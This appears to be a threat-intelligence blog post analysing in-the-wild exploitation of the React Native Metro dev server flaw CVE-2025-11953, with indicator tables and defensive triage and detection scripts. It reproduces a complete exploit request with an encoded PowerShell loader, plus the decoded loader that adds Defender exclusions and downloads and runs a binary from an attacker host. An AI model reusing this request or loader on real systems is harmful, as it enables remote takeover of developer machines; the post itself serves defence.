    Metro4Shell: Exploitation of React Native’s Metro Server in the Wild | Blog

    By admin | March 28, 2026


    Metro Development Server Timeline

    VulnCheck observed exploitation of CVE-2025-11953 on December 21, 2025, when our Canary network recorded exploitation of a Metro Development Server. The vulnerability, which we jokingly refer to as Metro4Shell, was automatically added to VulnCheck KEV the same day. Additional exploitation observed in January delivered the same payloads on January 4, 2026 and January 21, 2026, indicating continued operational use.

    Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of 0.00405. This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide search data shows, exposed on the public internet.

    VulnCheck customers had coverage for this vulnerability from November, through exploits and Suricata rules developed by the VulnCheck Initial Access Intelligence team. That early work ultimately informed and powered the detection logic deployed across the VulnCheck Canary network.

    Metro is the JavaScript bundler and development server used by React Native applications during development and testing. Under default conditions, Metro can bind to external interfaces and expose an /open-url endpoint. The endpoint requires no authentication, and on Windows it lets a remote attacker execute arbitrary OS commands with a single POST request whose JSON body carries the command in the url field.

    The vulnerability was found by JFrog researchers who published a root cause analysis on their blog. This was followed by multiple proof of concept exploits on GitHub.

    The exploitation observed by VulnCheck was neither experimental nor exploratory. The payloads delivered through the Canary network were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.

    The attackers employed a multi-stage PowerShell-based loader delivered through cmd.exe. The initial PowerShell stage is passed via -EncodedCommand, i.e. as base64-encoded UTF-16LE text. An example of the observed attack pattern follows:

    POST /open-url HTTP/1.1
    Host: VC_REDACTED
    User-Agent: curl/7.85.0
    Content-type: application/json
    Content-Length: 4632
    Connection: Close
    
    {"url":"cmd /c powershell -EncodedCommand JABjAHUAcgByAGUAbgB0AEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgACQAKABHAGUAdAAtAEwAbwBjAGEAdABpAG8AbgApAC4AUABhAHQAaAA7AAoAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFQAZQBtAHAAUABhAHQAaAAoACkAOwAKAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAYwB1AHIAcgBlAG4AdABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAcwB5AHMAdABlAG0AVABlAG0AcABEAGkAcgBlAGMAdABvAHIAeQAgADIAPgAgACQAbgB1AGwAbAA7AAoACgAkAHQAYwBwAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdAAoACIAOAAuADIAMQA4AC4ANAAzAC4AMgA0ADgAIgAsADYAMAAxADIANAApADsACgAkAHQAYwBwAFMAdAByAGUAYQBtACAAPQAgACQAdABjAHAAQwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAKACQAcgBlAHEAIAA9ACAAIgBHAEUAVAAgAC8AdwBpAG4AZABvAHcAcwAiADsACgAkAHIAZQBxAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcgBlAHEAKQA7AAoAJAB0AGMAcABTAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcgBlAHEAYgAsADAALAAkAHIAZQBxAGIALgBMAGUAbgBnAHQAaAApADsACgAKACQAZQB4AGUAYwBwACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABzAHkAcwB0AGUAbQBUAGUAbQBwAEQAaQByAGUAYwB0AG8AcgB5ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgAGoAegBEAGoAaQBxAEsAVQAuAGUAeABlADsACgAkAGYAaQBsAGUAUwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBXAHIAaQB0AGUAKAAkAGUAeABlAGMAcAApADsACgAKACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAANAAwADkANgA7AAoAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAwADsACgB3AGgAaQBsAGUAIAAoACgAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHQAYwBwAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApACkAIAAtAGcAdAAgADAAKQAgAHsACgAgACAAIAAgACQAZgBpAGwAZQBTAHQAcg
BlAGEAbQAuAFcAcgBpAHQAZQAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7AAoAfQAKACQAZgBpAGwAZQBTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKACQAdABjAHAAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAkAHQAYwBwAEMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAGUAeABlAGMAcAAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACcAMwBxAGgAQQBJAG0AYQBMAGoANwA0AHoASABkAHkAeQBHAEQAUQBGAHMATgBzAGYATABMAHUARgBoAFcATQBoAFgANwBDAHIAcwBiAGwAQgBJADMAbQBYAGoAcgBrAG4ARwA5AHkAOABBAHoAVQBXAHUAOQB3AGUATQA3AHEATgBpADIAWQBzAFgANwBtAG4AcQBMAEoASABKAEcAYQBXAGoANgBzAHMASAA5AHEAawBCAHoAYwBDAHAATgBnAGQATQA3AG0ATABuADIARQBrAFEATAB5AHAAdgA3AHgARwBPAG0AVwBSAGoANgBVAHMARwBOAHEAawBCAHoATQBIAHMATgBzAGYATABMAHUASgBoAFcAOAA2AFEANwBtAG4AcwBiAHgAQwBPAG0AVwBSAGgATABFAHIASAA5AHkANABBAGkAQQBFAHUATgA4AEIASgBiAE8AUwBsAEcARQBuAFgANwBtAG0AcAA3AEoASABKAEcAYQBYAGoASwBzAHMASAA5AHUAawBCAHoASQBZAHUAOQBzAGUATQA3AHEASwBuAEcAMABpAFEATAAyAG0AdgA3AEIARgBPAG0AUwBUAGsAcgBvAHYASAA4AE8AKwBCAFQAbwBBAHYAOQBrAGUAUABiAGkASwBpADIAWQBuAFIAcQBhAHUAcQA3AGwAZgBKAG0AYQBYAGgAcgAwAGwASAB0AHUAcQBBAEQAQQBZAHUAOQBvAGYATQA3AG0ASgBsAG4AawBqAFIAcgBLAHAAcgA3AGwARABKAEgAZQBSAGkANgBVAHYASABOAHEAawBCAHoAUQBHAHAATgB3AGQASgA3ADIATQBsAEcATQBoAFUAYgBtAHUAcgBLAFoAQQBKAEcASwBMAGoAYgBzAG8AQQBkAHkAOQBEAHoAbwBQAHUATgBRAFcAUABiAHEATgBsADMAawBsAFEANwB5AHgAcgBMAHQAZgBMAEcAQwBmAGkAcgBzAHMARwA5AHEAcQBEAGkANABFAHUAOQBVAEIATAA3AGkASQBpADIASQBrAFMANwA2AHYAcgByAHQAQgBOAEcAVwBVAGoAcQBVAGsASABjAE8ANwBCAGoARQBZAHMAdABvAFYASwA3AHUATgBsAFcAOAAwAFEANwBxAHQAcwBiAGwAQQBMAEgAbQBVAGoAYgBrAHoASAB0AHEAeQBEAEQAZwBCAHYATgB3AFAATAA3AG0AUABpADIARQA2AFEANwB5AG0AcwBiAGwARgBKAFcAMgBUAGkAYgBvAG8ARAA5ACsANABCAEMANABPAHMAcwBNAGUASwA3AGkAUwBsAEcANABzAFMANwA2AHYAcgByAHAAQgBOAEcAKwBMAGoAYgA4AHQAQQBkACsANgBCAEMANABBAHYAdABjAFoATABMAG0AUABoAFcATQBqAFgANwBxAHIAcgBhAFoAQQBKAEcAKwBMAGkANwBvAG4ARwBkADIANwBCAGoAYwBXAHYAdABvAEIATAA3ACsAUABpADIAWQBqAFIAcQBhAHUAcgBMAGwATABJAG0AZQBVAGoATAA0ADkASAB0AG0AawBCAHoAQQBGAHAATgB3AFoASwBLAFcATg
BsAG0AQQB1AFIAcgBpAHEAcgBhAGgASgBPAG0AVwBVAGkANgBVAHMARgB0AFcAawBCAEQARQBDAHMATgBzAGYATABMAHEATgBoAFcAOAA2AFEANwBtAG4AcwBiAHAARABJAFgAbQBSAGoAcgBFAHIASAA5AHkANgBCAHkAQQBDAHYAYwBNAGQASwBiAG0AUwBrAEcAOAA2AFMAYgB5AGwAcQBiAGgAQQBKAEcANgBGAGkATAB3AHoASABkAG0ANQBHAEQARQBFAHYAYwBNAGUASwBiAHUARwBrADIAYwBsAFIAYgB1AC8AcgByAGgARwBPAG0AYQBTAGkASwBVAG8ASABjAE8ANABBAFQAbwBBAHUAdAB3AGIASwA2AHUATgBsAEcAWQA2AFEATABtAHgAcgByAEIAZgBKAFcAKwBTAGgAcgAwAHQASAB0ADYANQBGAGoAUQBCAHAATgA4AGMASgBhAFcATwBsADIATQA2AFEAcgBtAGwAcQBiAGgAQQBKADIANgBpAEsAMABnAEQAQgBNAHAASABlAG8AdwBKAE8AMABxAGMALwBxAHIAQQAxAGkAYQBSADgAZgB0AHYAVQB4AGMANQBvAHoAMgBHAG4AUQA9AD0AJwA="}
    

    When decoded, the PowerShell payload performs the following actions:

    1. Adds Microsoft Defender exclusion paths for the current working directory and the system temporary directory.
    2. Establishes a raw TCP connection to an attacker-controlled host and port.
    3. Sends the literal string GET /windows over that socket. This is not a complete HTTP request (no version line, no headers), so the transfer is a raw TCP stream rather than an HTTP exchange.
    4. Writes everything received until the connection closes to a file in the system's temporary directory.
    5. Executes the downloaded binary with a large argument string.

    The decoded payload follows:

    $currentDirectory = $(Get-Location).Path;
    $systemTempDirectory = [System.IO.Path]::GetTempPath();
    
    Add-MpPreference -ExclusionPath $currentDirectory 2> $null;
    Add-MpPreference -ExclusionPath $systemTempDirectory 2> $null;
    
    $tcpClient = New-Object System.Net.Sockets.TcpClient;
    $tcpClient.Connect("8.218.43.248",60124);
    $tcpStream = $tcpClient.GetStream();
    $req = "GET /windows";
    $reqb = [System.Text.Encoding]::UTF8.GetBytes($req);
    $tcpStream.Write($reqb,0,$reqb.Length);
    
    $execp = Join-Path -Path $systemTempDirectory -ChildPath jzDjiqKU.exe;
    $fileStream = [System.IO.File]::OpenWrite($execp);
    
    $buffer = New-Object byte[] 4096;
    $bytesRead = 0;
    while (($bytesRead = $tcpStream.Read($buffer, 0, $buffer.Length)) -gt 0) {
        $fileStream.Write($buffer, 0, $bytesRead);
    }
    $fileStream.Close();
    $tcpStream.Close();
    $tcpClient.Close();
    Start-Process -FilePath "$execp" -ArgumentList '<long argument string omitted>'
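
    The script below is an added example, not VulnCheck's or Metro's code. It walks through the triage a responder would do on a capture of the shape shown above: confirm the request is a POST to /open-url, decide whether the url field is a real URL or injected shell input, decode the -EncodedCommand stage (base64 of UTF-16LE), and pull the C2 host and port, the dropped file name and the Defender exclusions out of it. The sample request is constructed by the script itself from a shortened copy of the decoded payload; the Host value 10.0.0.5:8081, the placeholder argument string and the benign debugger URL are assumptions made for the example.

```python
"""Triage a captured Metro /open-url request (added example, not project code)."""
import base64
import json
import re

# Cut down from the decoded payload on the page; the long Start-Process
# argument string is replaced by a placeholder. Constructed sample input.
SAMPLE_SCRIPT = (
    "$currentDirectory = $(Get-Location).Path;\n"
    "$systemTempDirectory = [System.IO.Path]::GetTempPath();\n"
    "Add-MpPreference -ExclusionPath $currentDirectory 2> $null;\n"
    "Add-MpPreference -ExclusionPath $systemTempDirectory 2> $null;\n"
    "$tcpClient = New-Object System.Net.Sockets.TcpClient;\n"
    '$tcpClient.Connect("8.218.43.248",60124);\n'
    "$execp = Join-Path -Path $systemTempDirectory -ChildPath jzDjiqKU.exe;\n"
    "Start-Process -FilePath \"$execp\" -ArgumentList 'PLACEHOLDER'\n"
)

def encode_command(script: str) -> str:
    """-EncodedCommand expects base64 of the script encoded as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")

def build_open_url_request(url: str, host: str = "10.0.0.5:8081") -> str:
    """Constructed request in the shape of the capture above (host is assumed)."""
    body = json.dumps({"url": url})
    return (
        "POST /open-url HTTP/1.1\r\n" f"Host: {host}\r\n"
        "User-Agent: curl/7.85.0\r\n" "Content-type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n" "Connection: Close\r\n\r\n" + body
    )

def parse_http_request(raw: str):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

HTTP_SCHEME = re.compile(r"^https?://", re.I)
# Characters a browser URL never needs but a cmd.exe/PowerShell line does.
SHELL_CHARS = re.compile(r"[\s\"'|`^]")
# PowerShell accepts -e, -ec, -enc and -EncodedCommand for the same switch.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def open_url_value(raw: str):
    """Return the url field of a POST /open-url body, or None for anything else."""
    method, path, _headers, body = parse_http_request(raw)
    if method != "POST" or path.split("?", 1)[0] != "/open-url":
        return None
    try:
        url = json.loads(body).get("url")
    except (ValueError, AttributeError):
        return None
    return url if isinstance(url, str) else None

def is_injection(url: str) -> bool:
    """Anything that is not a plain http(s) URL is treated as injected input.
    '&' and '?' are deliberately allowed: query strings need them."""
    return not HTTP_SCHEME.match(url) or bool(SHELL_CHARS.search(url))

def extract_indicators(script: str) -> dict:
    connect = re.search(r'\.Connect\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)', script)
    dropped = re.search(r"-ChildPath\s+\"?([\w.-]+)\"?", script)
    exclusions = re.findall(r"Add-MpPreference\s+-ExclusionPath\s+(\S+)", script)
    return {
        "c2_host": connect.group(1) if connect else None,
        "c2_port": int(connect.group(2)) if connect else None,
        "dropped_file": dropped.group(1) if dropped else None,
        "defender_exclusions": exclusions,
    }

def triage(raw: str) -> dict:
    url = open_url_value(raw)
    result = {"injection": url is not None and is_injection(url), "indicators": {}}
    if result["injection"]:
        m = ENCODED_ARG.search(url)
        if m:  # decode the first stage and harvest indicators from it
            result["indicators"] = extract_indicators(decode_command(m.group(1)))
    return result

ATTACK = build_open_url_request(
    "cmd /c powershell -EncodedCommand " + encode_command(SAMPLE_SCRIPT))
BENIGN = build_open_url_request("http://localhost:8081/debugger-ui?a=1&b=2")

if __name__ == "__main__":
    print(triage(ATTACK))
    print(triage(BENIGN))
```

    The scheme check is what catches the observed payload (it starts with cmd /c, not http://); the character check is there for the case where an attacker prefixes a real URL and appends a command. The same rule, applied on the server side before the url value reaches any process-spawning call, is the shape of the fix a dev-server should carry.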
    

    This same methodology was observed across multiple attacks. The deliberate addition of Microsoft Defender exclusions before payload retrieval, rather than an attempt to disable Defender outright, indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow.
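    The network capture is one side of this; the other is what the same activity looks like in process-creation telemetry on the developer's machine. The following is an added example, not VulnCheck detection content: it evaluates Sysmon-style process events for the chain implied by the payload above, node.exe (the process Metro runs under, which is an assumption of this example) spawning cmd.exe, which spawns powershell.exe with an encoded command that adds Defender exclusions and pulls a binary over raw TCP. The events are constructed, including the benign ones used to show what is not flagged.

```python
"""Endpoint-side detection for the loader chain (added example, constructed events)."""
import base64
import re

ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def encode_command(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind a -EncodedCommand argument, or '' if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def ancestors(by_pid: dict, pid: int, max_depth: int = 4) -> list:
    """Follow ppid links; return ancestor image names, nearest first."""
    chain, ev = [], by_pid.get(pid)
    while ev and len(chain) < max_depth:
        ev = by_pid.get(ev["ppid"])
        if ev:
            chain.append(ev["image"].lower())
    return chain

def evaluate(events: list) -> list:
    """One finding per PowerShell process that matches the loader pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        parents = ancestors(by_pid, ev["pid"])
        reasons = []
        if "node.exe" in parents:
            reasons.append("spawned under node.exe (dev server)")
        if ENCODED_ARG.search(ev["cmdline"]):
            reasons.append("uses -EncodedCommand")
        script = decode_encoded_command(ev["cmdline"]) or ev["cmdline"]
        if re.search(r"Add-MpPreference\s+-ExclusionPath", script, re.I):
            reasons.append("adds Defender exclusion path")
        if re.search(r"Net\.Sockets\.TcpClient", script, re.I) and \
                re.search(r"Start-Process", script, re.I):
            reasons.append("raw TCP download followed by Start-Process")
        # Require the dev-server ancestry plus at least one payload behaviour, so
        # an admin adding an exclusion from an interactive shell is not flagged.
        if "node.exe" in parents and len(reasons) >= 2:
            findings.append({"pid": ev["pid"], "reasons": reasons})
    return findings

# Constructed loader script with the behaviours seen in the decoded payload.
LOADER = (
    "Add-MpPreference -ExclusionPath $env:TEMP 2> $null;\n"
    '$c = New-Object System.Net.Sockets.TcpClient; $c.Connect("8.218.43.248",60124);\n'
    'Start-Process -FilePath "$env:TEMP\\jzDjiqKU.exe"'
)
ENC = encode_command(LOADER)

# Constructed Sysmon-style events: pid, ppid, image, command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "node.exe",
     "cmdline": "node node_modules/.bin/react-native start"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": "cmd /c powershell -EncodedCommand " + ENC},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell -EncodedCommand " + ENC},
    # Benign: a build step spawned by the same dev server.
    {"pid": 400, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd /c npm run lint"},
    # Benign: an admin adds an exclusion from an interactive shell.
    {"pid": 500, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 600, "ppid": 500, "image": "powershell.exe",
     "cmdline": "powershell Add-MpPreference -ExclusionPath C:\\dev"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f)
```

    The ancestry walk is the part that carries the signal: Add-MpPreference and -EncodedCommand each have legitimate uses, but a dev-server process that has no business spawning a shell is the context that turns them into a high-confidence alert.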

    The downloaded binary is UPX-packed (SHA-256: d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6), but once unpacked (SHA-256: 7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886), the payload is revealed to be a Rust-based binary that incorporates basic anti-analysis logic, including runtime checks intended to hinder static inspection.

    VulnCheck observed attacks originating from 65.109.182.231, 223.6.249.141, and 134.209.69.155, with the “windows” payload hosted at 8.218.43.248:60124 and 47.86.33.195:60130. The same infrastructure also hosted a corresponding binary named “linux”.

    The most important aspect of this activity is not the payloads or the infrastructure involved, but the timeline. VulnCheck observed exploitation attempts in December. As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared.

    Attackers do not wait for KEV listings, vendor summaries, or consensus narratives. Once proof-of-concept code exists and scanning is viable, exploitation follows quickly. Developer tooling is particularly attractive because it is widespread, inconsistently monitored, and rarely treated as a production-grade attack surface.

    CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.

    Organizations cannot afford to wait for CISA KEV inclusion, vendor reports, or broad consensus before taking action. Exploitation often begins as soon as exposure exists. Identifying those gaps early is critical to reducing attacker dwell time and preventing opportunistic compromise.

    This is exactly the class of activity VulnCheck Canaries are designed to surface, and why VulnCheck KEV tracks real-world exploitation as it happens instead of after narratives solidify. Tracking exploitation as it happens is a prerequisite for defending modern infrastructure.

    Indicator         Observed Role
    65.109.182.231    Exploitation source
    223.6.249.141     Exploitation source
    134.209.69.155    Exploitation source
    8.218.43.248      Payload host (Windows)
    47.86.33.195      Payload host (Windows and Linux)

    SHA-256 Hash                                                        Description
    d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6    UPX-packed Windows payload
    7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886    Unpacked Windows payload
    d1886b189474b02467ed2845df0938cec9785e99c3d4b04e0b7de3cafbee4182    UPX-packed Linux payload
    6686d4baa9d483da27ba84dab85e96e42b790b608571de7bcb07a1fd7c975fe3    Unpacked Linux payload

    VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. For more research like this, check out our blog posts Frost Checks First, The Mystery OAST Host Behind a Regionally Focused Exploit Operation, and XWiki Under Increased Attack.

    Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.
